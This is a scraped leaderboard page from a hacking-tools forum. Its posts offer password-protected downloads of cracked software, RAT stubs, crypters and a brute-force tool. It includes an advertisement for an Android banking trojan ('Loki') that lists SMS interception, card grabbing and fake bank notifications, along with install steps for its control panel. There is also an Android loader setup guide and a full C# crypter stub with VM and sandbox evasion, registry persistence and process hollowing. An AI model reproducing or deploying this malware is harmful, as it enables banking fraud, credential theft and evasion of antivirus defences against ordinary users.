      Leaderboard


      Popular Content

      Showing content with the highest reputation on 03/06/2019 in all areas

      1. 2 points
        Download: [HIDE][Hidden Content]] Password: level23hacktools.com
      2. 2 points
        😛 AutoIT [HIDE][Hidden Content]] Pass: level23hacktools.com [Hidden Content]
      3. 2 points
        Website: [Hidden Content] Download: [Hidden Content] Password: level23hacktools.com
      4. 1 point
        Description from website: With Bunifu .NET UI Framework, creating beautiful user-interfaces is highly simplified. You don’t have to be a great designer to create quality & modern user-interfaces; Bunifu .NET UI Framework does it for you. 1. Open Visual Studio 2. Create A Project (Winform (C# or VB.NET)) 3. Go To Toolbox -> Right Button Click On The Toolbox Blank Space -> Click Add Tab -> Give Any Name -> Drag And Drop The DLL To The Tab... 4. Done [Hidden Content] Version 1.8.0.1 Release date: 19th September, 2018 Fixed an issue where the attached docking Form flickers during an undocking operation Enhancements [Hidden Content] Pass: level23hacktools.com
      5. 1 point
        Features of the bot: - Graber cards - Spam on user contacts - Calling the number - Forwarding incoming calls - Launching user applications - Automatic withdrawal of fake notifications, with taken bank icons - Interception, block-deleting incoming SMS, sending, including short numbers - Download all user application names - Graber contacts - Screen locker - Launch pages in the browser - Launch user applications - Search for Bank applications - Browser history graber - Socks5 module - Sending USSD - Geolocation - Spam by number base Admin panel: Detailed statistics on countries, app, url histories, selerians, etc. The ability to issue commands to a particular bot, group, as well as all newcomers. Search by imei, sorting by installed applications, online bots, seler, countries. Cleaning of old logs. Separate statistics for traffic. Jabber notification. There is a possibility to load their injections, with the admin panel. Search by SMS, logs. Searching for links by history. The statistics for the tasks that have been issued are fulfilled. Etc. Additional info: The size of the bot is 150 kb. Stable work on Android 4-7. For basic work, root rights are not required. Request admin rights. To change the phone password, you need the admin rights (requested when installing). Change the password to Android Nougat (Android 7) version in part. Sending and intercepting SMS on all versions, deleting up to 4.4, downloading all SMS from 4.4, block SMS over 4.4 via SMS manager / Screen Locker (when locked via SMS manager, SMS is not seen only by the Holder). Permanent withdrawal of bank (fake) notifications with bank icons, the text can be set with the admin panel when you click on the message the injection is started. In the presence of injections of euro countries, they are bundled with a bot. An additional functional is possible. Android Bot Loki We want to offer a bot of our own developments. 
A completely new bot engine, the wishes of the customers are part of the functions of are automated, advanced functionality. Bot features: - Card grabber - Phone contacts spam - Custom numbers spam - Call to number - Incoming call forwarding - Start user applications - Automatic invoke fake notifications with custom icons - Catch, block, delete incoming SMS. Sent new SMS - Get list of user applications - Contact grabber - Screen locker - Web application browser - Bank applications searching - Browser history grabber - Socks5 module - Geolocation Admin panel: Detalized statistics of countries, app, history, sellers etc ... Ability for send command to one, list , or only new bots. IMEI search. Sort by installed applications, online, sellers, countries. Cleanup old logs Dedicated statistics for sellers. Jabber notifications. Admin panel have an ability to upload your own injects. SMS, logs searching. History links searching. Task statistiks. Additional information: Bot size: 150kb Bot is working with Android 4-7 Root permissions is NOT required for common actions. There are request for getting root permissions Root permissions required for Image phone password changing Phone password changing for All Android Nougat (All Android 7) of Post Send and catch statement SMS works on all All Android versions, the delete works only for 4.4, download and block SMS works All Android 4.4 and newest Permanent display bank notifications with custom text from admin panel. Bot have injects for euro countries. 
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ Loki admin panel install instructions: apt-get update && apt-get upgrade -y apt-get install apache2 libapache2-mod-php5 mysql-server php5 php5-mysql -y apt-get install default-jre default-jdk -y Debian 7: apt-get install ia32-libs lib32z1 lib32ncurses5 -y Debian 8: dpkg --add-architecture i386 apt-get update apt-get install libstdc++6:i386 libgcc1:i386 zlib1g:i386 libncurses5:i386 lib32z1 lib32ncurses5 Next: wget [Hidden Content] wget -O apktool.jar [Hidden Content] chmod +x ~/apktool.jar chmod +x ~/apktool mv ~/apktool.jar /usr/local/bin/ mv ~/apktool /usr/local/bin/ Next: unpack loki.tar to new dir. something like that: tar xf loki.tar -C /var/www/ change files owner: chown -R www-data:www-data /var/www/ Run: mysql create database loki; grant all privileges on loki.* to loki@localhost identified 'DB_PASSWORD'; grant all privileges on loki.* to loki@localhost identified by 'DB_PASSWORD'; quit import bd file loki4dev.sql: mysql loki < /var/www/site/loki4dev.sql mysql -u root -pbolonka1 loki </var/www/site/loki4dev.sql Edit: /var/www/site/db.php and enter mysql database access: db: loki db user: loki db password: DB_PASSWORD DONE!!!! address admin panel [Hidden Content] or [Hidden Content] login with name bot4fun and password J1HPbmr ...................................................................... Download: [HIDE][Hidden Content]] Password: level23hacktools.com
      6. 1 point
        Only works with mail.ru [HIDE][Hidden Content]] Pass: HN1_level23hacktools.com Server.exe Scan: [Hidden Content]
      7. 1 point
        Scan: Download: [hide][Hidden Content]] Password: level23hacktools.com
      8. 1 point
        > sportp2p.com/live-stream/ lshunter.net/live/ mytvfree.me tvfree.me aovivoagora.com aovivoagora.online assia.tv assistirtvbr.tv assistirtvonline.tv atdhe.eu atdhe.mx atdhes.eu atdhe.me atdhe.cc More sites will be added later Download: [Hidden Content] Virus Scan: [Hidden Content]
      9. 1 point
        Scan: Stub(0/22) :[Hidden Content] Njrat before(21/22) :[Hidden Content] Njrat after(0/22) :[Hidden Content] Download: [HIDE][Hidden Content]] Password: level23hacktools.com
      10. 1 point
      11. 1 point
        Scan: [Hidden Content] Download: [HIDE][Hidden Content]] Password: level23hacktools.com
      12. 1 point
        Supported Applications: All 32-bit, 64-bit and “Any CPU” apps, including Console, GUI, Windows Forms (WinForms), WPF and ASP.Net apps, libraries, components, controls, VSTO based Word/Excel/Outlook/etc Office Add-Ins, Windows Services & WCF Services. Obfuscated apps are FIPS compliant. Supported Tools: All editions of Visual Studio 2013, Visual Studio 2012, Visual Studio 2010, Visual Studio 2008, Visual Studio 2005, Visual Studio 2003, Visual Studio 2002. Supported .Net Frameworks: All from .Net Framework 1.0 to .Net Framework 4.5. Supported Languages: All managed languages including C#, Visual Basic.Net (VB.Net), Managed C++, J# and many others. .Net Compact Framework: 1.1, 2.0, 3.5 & 4.0. Silverlight: 2.0, 3.0, 4.0 and 5.0 including Silverlight for Windows Phone 7.0/7.5/8.0 and above. Metro Framework: Supports Windows 8 Metro/WinRT apps. XNA Framework: 2.0, 3.0 & 4.0 .Net Micro Framework: 3.0 & 4.0 Additional Frameworks Supported: Mono Assemblies and Mono-Android Assemblies and Unity3D assemblies. Supported OS: 32-bit (x86) and 64-bit (x64) versions of: Windows 8, Windows 7, Windows Vista, Windows XP, Windows 2008, Windows 2003, Windows 2000, Windows Me, Windows 98, Windows NT [Hidden Content] [HIDE][Hidden Content]] Pass: level23hacktools.com
      13. 1 point
        [HIDE][Hidden Content]] Pass: level23hacktools.com
      14. 1 point
        THC-Hydra is a very fast (multi-threaded) network logon cracker which supports many different services: AFP, Cisco, cisco-enable, CVS, Firebird, ftp, http-get, http-head, http-proxy, https-get, https-head, https-form-get, https-form-post, ICQ, IMAP, IMAP-NTLM, ldap2, ldap3, MySQL, mysql, NCP, nntp, oracle-listener, PCAnywhere, pcnfs, pop3, pop3-NTLM, Postgres, rexec, rlogin, rsh, sapr3, sip, smb, smbnt, SMTP-auth, SMTP-auth-NTLM, SNMP, socks5, ssh2, svn, TeamSpeak, telnet, vmauthd, vnc. THIS TOOL IS FOR LEGAL PURPOSES ONLY! Changelog 8.8 * New web page: [Hidden Content] * added PROBLEMS file with known issues * rdp: disabled the module as it does not support the current protocol. If you want to add it contact me * ldap: fixed a dumb strlen on a potential null pointer * http-get/http-post: – now supports H=/h= parameters same as http-form (thanks to mathewmarcus@github for the patch) – 403/404 errors are now always registered as failed attempts * mysql module: a non-default port was not working, fixed * added -w timeout support to ssh module * fixed various memory leaks in http-form module * corrected hydra return code to be 0 on success * added patch from debian maintainers which fixes spellings * fixed weird crash on x64 systems * many warning fixes by crondaemon [Hidden Content]
      15. 1 point
      16. 1 point
        The cryptors were taken from another forum, they were hidden from ordinary users. I decided to share with you. Take my friends ScanMyBin IMG IMG2 Download PCLOUD
      17. 1 point
        android loader installation guide 20/11/17 Server requirements: - OS debian 7.0 or newer - RAM 2 Gb or more - apache 2 - php 5 - mysql 1. bot Open folder 'bot' in Android studio 2.0 or higher Set correct server ip or domain in bot/app/src/main/java/task/loader/Constants.java Build apk 2. panel Upload panel to the server Setup apache with panel/apache_loader.conf Create mysql database named 'loader' and import panel/db_loader.sql Set mysql access data in panel/db.php Copy panel/video/aapt/libc++.so to /usr/lib/ Setup basic auth in panel/video/.htaccess: htpasswd -cb /var/data/loader.passwd USER PASSWORD make panel/tmp writeable 3. usage - install loader on the phone - open panel with default login 'admin' and password '123123' - bot should appear in 'Bots' section - upload target apk (that should be installed by loader) to any host - create new task in Loader panel, set direct url to apk - set number of attemps - how much times loader will propose user to install the target apk - make task 'active' - make sure loader is installed on your device, disable screen - enable screen again - loader will propose you to install the target apk - it will propose user to install every 20 seconds once it will be done Optionally you can show landing page first, set url of the landing in the task settings Download: [HIDE][Hidden Content]] Password: level23hacktools.com
      18. 1 point
      19. 1 point
        Invalid key, pls someone share the activation key here on comment..
      20. 1 point
        @alenkad94 click in like button
      21. 1 point
        Types of malware and AV detection. • Evasion measures. • Crypters. • Types and operation. • Stub. • FUD stub. • Modding techniques. [hide][Hidden Content]]
      22. 1 point
        [HIDE-THANKS] >using System; using System.Collections.Generic; using System.ComponentModel; using System.Data; using System.Drawing; using System.Linq; using System.Text; using System.Windows.Forms; using System.Diagnostics; using Microsoft.Win32; using System.Threading; namespace WindowsFormsApplication1 { public partial class Form1 : Form { public Form1() { InitializeComponent(); } private void button2_Click(object sender, EventArgs e) { OpenFileDialog d = new OpenFileDialog(); if (d.ShowDialog() == DialogResult.OK) txtLinkToFile.Text = d.FileName; } private void button1_Click(object sender, EventArgs e) { System.Resources.ResourceWriter w = new System.Resources.ResourceWriter("res.resources"); w.AddResource("file", RC4EncryptDecrypt(System.IO.File.ReadAllBytes(txtLinkToFile.Text), "nitin890")); w.Close(); System.CodeDom.Compiler.CompilerParameters p = new System.CodeDom.Compiler.CompilerParameters(); p.GenerateExecutable = true; p.OutputAssembly = "Crypted.exe"; p.ReferencedAssemblies.Add("System.dll"); p.EmbeddedResources.Add("res.resources"); p.CompilerOptions += "/t:winexe"; System.CodeDom.Compiler.CompilerResults r = new Microsoft.CSharp.CSharpCodeProvider().CompileAssemblyFromSource(p, Properties.Resources.Source); System.IO.File.Delete("res.resources"); foreach (System.CodeDom.Compiler.CompilerError err in r.Errors) MessageBox.Show(err.ToString()); MessageBox.Show("Crypted! 
Saved as Crypted.exe!", "Complete!", MessageBoxButtons.OK, MessageBoxIcon.Information); } public byte[] RC4EncryptDecrypt(byte[] bytes, string Key) { byte[] key = System.Text.Encoding.ASCII.GetBytes(Key); byte[] s = new byte[256]; byte[] k = new byte[256]; byte temp; int i, j; for (i = 0; i { s[i] = (byte)i; k[i] = key[i % key.GetLength(0)]; } j = 0; for (i = 0; i { j = (j + s[i] + k[i]) % 256; temp = s[i]; s[i] = s[j]; s[j] = temp; } i = j = 0; for (int x = 0; x { i = (i + 1) % 256; j = (j + s[i]) % 256; temp = s[i]; s[i] = s[j]; s[j] = temp; int t = (s[i] + s[j]) % 256; bytes[x] ^= s[t]; } return bytes; } private void txtLinkToFile_TextChanged(object sender, EventArgs e) { } } } >using System; using System.Collections.Generic; using System.Data; using System.Drawing; using System.Diagnostics; using System.Text; using System.Windows.Forms; using System.IO; using System.Runtime.InteropServices; using System.Resources; using System.Security.Cryptography; using System.Reflection; using Microsoft.Win32; using System.Security.Principal; using System.Net; using System.Management; [assembly: AssemblyTitle("[assemblytitle]")] [assembly: AssemblyDescription("[assemblyinfo]")] [assembly: AssemblyCompany("[assemblycorp]")] [assembly: AssemblyProduct("[assemblyproduct]")] [assembly: AssemblyCopyright("[assemblycopyright]")] [assembly: AssemblyTrademark("[assemblytrademark]")] [assembly: AssemblyVersionAttribute("[assemblyversion]")] [assembly: AssemblyFileVersionAttribute("[assemblyfileversion]")] static class Program { [sTAThread] static void Main() { Application.EnableVisualStyles(); Application.SetCompatibleTextRenderingDefault(false); Application.Run(new PG()); } } class RX { [DllImport("kernel32.dll")] static extern IntPtr GetModuleHandle(string module); [DllImport( "kernel32.dll", SetLastError=true )] static extern IntPtr FindResource(IntPtr hModule, string lpName, string lpType); [DllImport("kernel32.dll", SetLastError=true)] static extern IntPtr LoadResource(IntPtr 
hModule, IntPtr hResInfo); [DllImport("kernel32.dll", SetLastError=true)] static extern uint SizeofResource(IntPtr hModule, IntPtr hResInfo); public static byte[] RM() { ResourceManager Manager = new ResourceManager("Encrypted", Assembly.Load(File.ReadAllBytes(Application.ExecutablePath))); byte[] bytes = (byte[])Manager.GetObject("encfile"); return bytes; } } public partial class PG : Form { static bool waited = false; private void InitializeComponent() { this.SuspendLayout(); this.FormBorderStyle = FormBorderStyle.None; this.ShowInTaskbar = false; this.ResumeLayout(false); this.Visible = false; this.WindowState = FormWindowState.Minimized; bool dBool = false; if(dBool){ System.Timers.Timer dTimer = new System.Timers.Timer(); dTimer.Interval = (1000) * (1); dTimer.Elapsed += delayTimer_Elapsed; dTimer.Enabled = true; dTimer.Start(); while(!waited){} } bool pBool = false; if(pBool){ this.FormClosing += Closing; } } void delayTimer_Elapsed(object sender, System.Timers.ElapsedEventArgs e) { waited = true; } void Closing(object sender, FormClosingEventArgs e) { Process.Start(Application.ExecutablePath); } public PG() { InitializeComponent(); string injectionType = "[injectionType]"; string injectionPath = ""; switch(injectionType.ToLower()){ case "notepad.exe": injectionPath = Path.Combine(RuntimeEnvironment.GetRuntimeDirectory(), "vbc.exe");//@"C:\Windows\System32\notepad.exe"; break; case "vbc.exe": injectionPath = Path.Combine(RuntimeEnvironment.GetRuntimeDirectory(), "vbc.exe"); break; case "default browser": injectionPath = Path.Combine(RuntimeEnvironment.GetRuntimeDirectory(), "vbc.exe");//BrowserPath(); break; default: injectionPath = Path.Combine(RuntimeEnvironment.GetRuntimeDirectory(), "vbc.exe"); break; } bool adminonly = [adminonly]; bool msgbox = [msgbox]; bool startup = [startup-replace]; bool hide = [hide-replace]{!.estebbc:{"post_id":28763,"user_id":1}}; string storagemethod = "[storage-replace]"; bool downloader = [downloader-replace]; bool detectVM = 
[detectVM]; bool detectSandboxie = [detectSandboxie]; if(detectVM) { if(IsVM()) { MessageBox.Show("This process does not support VMs!", "Error!", MessageBoxButtons.OK, MessageBoxIcon.Error); Process.GetCurrentProcess().Kill(); } } if(detectSandboxie) { if(IsSandbox(Application.ExecutablePath)) { MessageBox.Show("This process does not support Sandboxes!", "Error!", MessageBoxButtons.OK, MessageBoxIcon.Error); Process.GetCurrentProcess().Kill(); } } if(adminonly){ if(!new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator)){ ProcessStartInfo pInfo = new ProcessStartInfo(); pInfo.FileName = Application.ExecutablePath; pInfo.Verb = "runas"; Process.Start(pInfo); Process.GetCurrentProcess().Kill(); } } if(downloader) { string url = "[downloaderurl]"; /*WebClient webClient = new WebClient(); webClient.DownloadFile(new Uri(url), "dl" + System.AppDomain.CurrentDomain.FriendlyName); System.IO.File.Delete(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "dl" + System.AppDomain.CurrentDomain.FriendlyName); System.IO.File.Move("dl" + System.AppDomain.CurrentDomain.FriendlyName, Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "dl" + System.AppDomain.CurrentDomain.FriendlyName); FileInfo Info = new FileInfo(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "dl" + System.AppDomain.CurrentDomain.FriendlyName); Info.Attributes = FileAttributes.Hidden; System.Diagnostics.Process.Start(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "dl" + System.AppDomain.CurrentDomain.FriendlyName);*/ } if(msgbox){ MessageBoxIcon icon; switch("[msgboxicon]"){ case "info": icon = MessageBoxIcon.Information; break; case "error": icon = MessageBoxIcon.Error; break; case "warning": icon = MessageBoxIcon.Warning; break; case "none": icon = MessageBoxIcon.None; break; default: icon = MessageBoxIcon.None; break; } MessageBox.Show("[msgboxbody]", "[msgboxtitle]", 
MessageBoxButtons.OK, icon); } byte[] filebytes = null; filebytes = RX.RM(); filebytes = AESDecrypt(filebytes, "[key-replace]"); IX.AA(filebytes, injectionPath); string installpath = "[installpath]"; if(installpath == "%appdata%"){ installpath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + System.AppDomain.CurrentDomain.FriendlyName; } if(installpath == "%tmp%"){ installpath = Path.GetTempPath() + System.AppDomain.CurrentDomain.FriendlyName; } if (!File.Exists(installpath)) { File.Copy(Application.ExecutablePath, installpath); } if (startup) AddToStartup(installpath); if (hide) HideFile(); } public static bool IsSandbox(string startupPath) { StringBuilder username = new StringBuilder(); Int32 nSize = 50; GetUserName(username, ref nSize); if ((int)GetModuleHandle("SbieDLL.dll") != 0) return true; switch (username.ToString().ToUpper()) { case "USER": return true; case "SANDBOX": return true; case "VIRUS": return true; case "MALWARE": return true; case "SCHMIDTI": return true; case "CURRENTUSER": return true; } string sPath = startupPath.ToUpper(); if (sPath == "C:\\FILE.EXE") return true; if (sPath.Contains("\\VIRUS")) return true; if (sPath.Contains("SANDBOX")) return true; if (sPath.Contains("SAMPLE")) return true; if ((int)FindWindow("Afx:400000:0", (IntPtr)0) != 0) return true; return false; } [DllImport("advapi32.dll", SetLastError = true)] public static extern bool GetUserName(StringBuilder sb, ref Int32 length); [DllImport("kernel32.dll")] public static extern IntPtr GetModuleHandle(string lpModuleName); [DllImport("user32.dll", SetLastError = true)] static extern IntPtr FindWindow(string lpClassName, IntPtr ZeroOnly); [DllImport("kernel32.dll")] extern public static IntPtr GetProcAddress(IntPtr hModule, string procedureName); [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)] public static extern uint GetFileAttributes(string lpFileName); public static bool IsVM() { if (regGet("HARDWARE\\DEVICEMAP\\Scsi\\Scsi 
Port 0\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0", "Identifier").ToUpper().Contains("VBOX")) { return true; } if (regGet("HARDWARE\\Description\\System", "SystemBiosVersion").ToUpper().Contains("VBOX")) { return true; } if (regGet("HARDWARE\\Description\\System", "VideoBiosVersion").ToUpper().Contains("VIRTUALBOX")) { return true; } if (regGet("SOFTWARE\\Oracle\\VirtualBox Guest Additions", "") == "noValueButYesKey") { return true; } if (GetFileAttributes("C:\\WINDOWS\\system32\\drivers\\VBoxMouse.sys") != (uint)4294967295) { return true; } if (regGet("HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 0\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0", "Identifier").ToUpper().Contains("VMWARE")) { return true; } if (regGet("SOFTWARE\\VMware, Inc.\\VMware Tools", "") == "noValueButYesKey") { return true; } if (regGet("HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 1\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0", "Identifier").ToUpper().Contains("VMWARE")) { return true; } if (regGet("HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 2\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0", "Identifier").ToUpper().Contains("VMWARE")) { return true; } if (regGet("SYSTEM\\ControlSet001\\Services\\Disk\\Enum", "0").ToUpper().Contains("vmware".ToUpper())) { return true; } if (regGet("SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000", "DriverDesc").ToUpper().Contains("VMWARE")) { return true; } if (regGet("SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000\\Settings", "Device Description").ToUpper().Contains("VMWARE")) { return true; } if (regGet("SOFTWARE\\VMware, Inc.\\VMware Tools", "InstallPath").ToUpper().Contains("C:\\PROGRAM FILES\\VMWARE\\VMWARE TOOLS\\")) { return true; } if (GetFileAttributes("C:\\WINDOWS\\system32\\drivers\\vmmouse.sys") != (uint)4294967295) { return true; } if (GetFileAttributes("C:\\WINDOWS\\system32\\drivers\\vmhgfs.sys") != (uint)4294967295) { return true; } // Detected whine if 
(GetProcAddress((IntPtr)GetModuleHandle("kernel32.dll"), "wine_get_unix_file_name") != (IntPtr)0) { return true; } if (regGet("HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 0\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0", "Identifier").ToUpper().Contains("QEMU")) { return true; } if (regGet("HARDWARE\\Description\\System", "SystemBiosVersion").ToUpper().Contains("QEMU")) { return true; } ManagementScope scope = new ManagementScope("\\\\.\\ROOT\\cimv2"); ObjectQuery query = new ObjectQuery("SELECT * FROM Win32_VideoController"); ManagementObjectSearcher searcher = new ManagementObjectSearcher(scope, query); ManagementObjectCollection queryCollection = searcher.Get(); foreach (ManagementObject m in queryCollection) { if (m["Description"].ToString() == "VM Additions S3 Trio32/64") { return true; } if (m["Description"].ToString() == "S3 Trio32/64") { return true; } if (m["Description"].ToString() == "VirtualBox Graphics Adapter") { return true; } if (m["Description"].ToString() == "VMware SVGA II") {return true; } if (m["Description"].ToString().ToUpper().Contains("VMWARE")) {return true; } if (m["Description"].ToString() == "") { return true; } } return false; } public static string regGet(string key, string value) { RegistryKey registryKey; registryKey = Registry.LocalMachine.OpenSubKey(key, false); if (registryKey != null) { object rkey = registryKey.GetValue(value, (object)(string)"noValueButYesKey"); if (rkey.GetType() == typeof(string)) { return rkey.ToString(); } if (registryKey.GetValueKind(value) == RegistryValueKind.String || registryKey.GetValueKind(value) == RegistryValueKind.ExpandString) { return rkey.ToString(); } if (registryKey.GetValueKind(value) == RegistryValueKind.DWord) { return Convert.ToString((Int32)rkey); } if (registryKey.GetValueKind(value) == RegistryValueKind.QWord) { return Convert.ToString((Int64)rkey); } if (registryKey.GetValueKind(value) == RegistryValueKind.Binary) { return Convert.ToString((byte[])rkey); } if (registryKey.GetValueKind(value) 
== RegistryValueKind.MultiString) { return string.Join("", (string[])rkey); } return "noValueButYesKey"; } return "noKey"; } public static byte[] AESDecrypt(byte[] input, string Pass) { System.Security.Cryptography.RijndaelManaged AES = new System.Security.Cryptography.RijndaelManaged(); byte[] hash = new byte[32]; byte[] temp = new MD5CryptoServiceProvider().ComputeHash(System.Text.Encoding.ASCII.GetBytes(Pass)); Array.Copy(temp, 0, hash, 0, 16); Array.Copy(temp, 0, hash, 15, 16); AES.Key = hash; AES.Mode = System.Security.Cryptography.CipherMode.ECB; System.Security.Cryptography.ICryptoTransform DESDecrypter = AES.CreateDecryptor(); return DESDecrypter.TransformFinalBlock(input, 0, input.Length); } public void AddToStartup(string installpath_) { if (installpath_ == null || installpath_ == "") { installpath_ = Path.GetTempPath() + System.AppDomain.CurrentDomain.FriendlyName; } RegistryKey Key = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run", true); Key.SetValue("[startup-name]", installpath_); } public void HideFile() { FileInfo Info = new FileInfo(Application.ExecutablePath); Info.Attributes = FileAttributes.Hidden; } } public class IX { [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)] internal static extern IntPtr LoadLibraryA([in, MarshalAs(UnmanagedType.LPStr)] string lpFileName); [DllImport("kernel32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)] static extern IntPtr GetProcAddress(IntPtr hModule, string procName); delegate bool ESS(string appName, StringBuilder commandLine, IntPtr procAttr, IntPtr thrAttr, [MarshalAs(UnmanagedType.Bool)] bool inherit, int creation, IntPtr env, string curDir, byte[] sInfo, IntPtr[] pInfo); delegate bool EXT(IntPtr hThr, uint[] ctxt); delegate bool TEX(IntPtr t, uint[] c); //all kernel32 delegate uint ION(IntPtr hProc, IntPtr baseAddr); //ntdll delegate bool ORY(IntPtr hProc, IntPtr baseAddr, ref IntPtr bufr, int bufrSize, ref IntPtr numRead); 
delegate uint EAD(IntPtr hThread); //kernel32.dll delegate IntPtr CEX(IntPtr hProc, IntPtr addr, IntPtr size, int allocType, int prot); delegate bool CTEX(IntPtr hProcess, IntPtr lpAddress, IntPtr dwSize, uint flNewProtect, ref uint lpflOldProtect); delegate bool MOR(IntPtr hProcess, IntPtr naddr, byte[] lpBuffer, uint nSize, out int lpNumberOfBytesWritten); //kernel32.dll delegate bool OP(byte[] bytes, string surrogateProcess); public T CreateAPI(string name, string method) { return (T)(object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(name), method), typeof(T)); } public static bool AA(byte[] bytes, string surrogateProcess) { IX p = new IX(); OP F1 = new OP(p.Q); bool Res = F1(bytes, surrogateProcess); return true; } public bool Q(byte[] bytes, string surrogateProcess) { String NTD = Convert.ToString((char)110) + (char)116 + (char)100 + (char)108 + (char)108; ESS CP = CreateAPI("kernel32", Convert.ToString((char)67) + (char)114 + (char)101 + (char)97 + (char)116 + (char)101 + (char)80 + (char)114 + (char)111 + (char)99 + (char)101 + (char)115 + (char)115 + (char)65); ION NUVS = CreateAPI(NTD, Convert.ToString((char)78) + (char)116 + (char)85 + (char)110 + (char)109 + (char)97 + (char)112 + (char)86 + (char)105 + (char)101 + (char)119 + (char)79 + (char)102 + (char)83 + (char)101 + (char)99 + (char)116 + (char)105 + (char)111 + (char)110); EXT GTC = CreateAPI("kernel32", Convert.ToString((char)71) + (char)101 + (char)116 + (char)84 + (char)104 + (char)114 + (char)101 + (char)97 + (char)100 + (char)67 + (char)111 + (char)110 + (char)116 + (char)101 + (char)120 + (char)116); TEX STC = CreateAPI("kernel32", Convert.ToString((char)83) + (char)101 + (char)116 + (char)84 + (char)104 + (char)114 + (char)101 + (char)97 + (char)100 + (char)67 + (char)111 + (char)110 + (char)116 + (char)101 + (char)120 + (char)116); ORY RPM = CreateAPI("kernel32", Convert.ToString((char)82) + (char)101 + (char)97 + (char)100 + (char)80 + (char)114 + (char)111 + 
(char)99 + (char)101 + (char)115 + (char)115 + (char)77 + (char)101 + (char)109 + (char)111 + (char)114 + (char)121); EAD RT = CreateAPI("kernel32", Convert.ToString((char)82) + (char)101 + (char)115 + (char)117 + (char)109 + (char)101 + (char)84 + (char)104 + (char)114 + (char)101 + (char)97 + (char)100); CEX VAE = CreateAPI("kernel32", Convert.ToString((char)86) + (char)105 + (char)114 + (char)116 + (char)117 + (char)97 + (char)108 + (char)65 + (char)108 + (char)108 + (char)111 + (char)99 + (char)69 + (char)120); CTEX VPE = CreateAPI("kernel32", Convert.ToString((char)86) + (char)105 + (char)114 + (char)116 + (char)117 + (char)97 + (char)108 + (char)80 + (char)114 + (char)111 + (char)116 + (char)101 + (char)99 + (char)116 + (char)69 + (char)120); MOR WPM = CreateAPI("kernel32", Convert.ToString((char)87) + (char)114 + (char)105 + (char)116 + (char)101 + (char)80 + (char)114 + (char)111 + (char)99 + (char)101 + (char)115 + (char)115 + (char)77 + (char)101 + (char)109 + (char)111 + (char)114 + (char)121); try { IntPtr procAttr = IntPtr.Zero; IntPtr[] processInfo = new IntPtr[4]; byte[] startupInfo = new byte[0x44]; int num2 = BitConverter.ToInt32(bytes, 60); int num = BitConverter.ToInt16(bytes, num2 + 6); IntPtr ptr4 = new IntPtr(BitConverter.ToInt32(bytes, num2 + 0x54)); if (CP(null, new StringBuilder(surrogateProcess), procAttr, procAttr, false, 4, procAttr, null, startupInfo, processInfo)) { uint[] ctxt = new uint[0xb3]; ctxt[0] = 0x10002; if (GTC(processInfo[1], ctxt)) { IntPtr baseAddr = new IntPtr(ctxt[0x29] + 8L); IntPtr buffer = IntPtr.Zero; IntPtr bufferSize = new IntPtr(4); IntPtr numRead = IntPtr.Zero; if (RPM(processInfo[0], baseAddr, ref buffer, (int)bufferSize, ref numRead) && (NUVS(processInfo[0], buffer) == 0)) { IntPtr addr = new IntPtr(BitConverter.ToInt32(bytes, num2 + 0x34)); IntPtr sz = new IntPtr((Int32)BitConverter.ToUInt32(bytes, num2+80)); IntPtr naddr = VAE(processInfo[0], addr, sz, 0x3000, 0x40); int lpNumberOfBytesWritten; 
WPM(processInfo[0], naddr, bytes, (uint)((int)ptr4), out lpNumberOfBytesWritten); int num5 = num - 1; for (int i = 0; i { int[] mzt = new int[10]; Buffer.BlockCopy(bytes, (num2 + 0xf8) + (i * 40), mzt, 0, 40); byte[] buffer2 = new byte[(mzt[4] - 1) + 1]; Buffer.BlockCopy(bytes, mzt[5], buffer2, Convert.ToInt32(null, 2), buffer2.Length); addr = new IntPtr(buffer2.Length); sz = new IntPtr(naddr.ToInt32() + mzt[3]); WPM(processInfo[0], sz, buffer2, (uint)addr, out lpNumberOfBytesWritten); } sz = new IntPtr(ctxt[0x29] + 8L); addr = new IntPtr(4); int nInt = naddr.ToInt32(); byte[] bN = BitConverter.GetBytes(Convert.ToUInt32(nInt)); Int64 i6 = addr.ToInt64(); uint u = (uint)0; WPM(processInfo[0], sz, bN, u, out lpNumberOfBytesWritten); ctxt[0x2c] = (uint)(naddr.ToInt32() + BitConverter.ToInt32(bytes, num2 + 40)); STC(processInfo[1], ctxt); } } RT(processInfo[1]); } } catch { return false; } return true; } } [/HIDE-THANKS]
      23. 1 point
        Re: D3vLeecher V1.2 thanks friend, you're the best
      24. 1 point
        Universal Fixer fixes dumps after dumping them with Dotnet Dumper or other similar tools and will also fix nasty things: multiple assembly/module definitions, wrong extends, etc. [hide][Hidden Content]]
      25. 1 point
        add >using System.Diagnostics; code: > private void button1_Click(object sender, EventArgs e) { string str = @"C:\windows\notepad.exe"; Process process = new Process(); process.StartInfo.FileName = str; process.Start(); }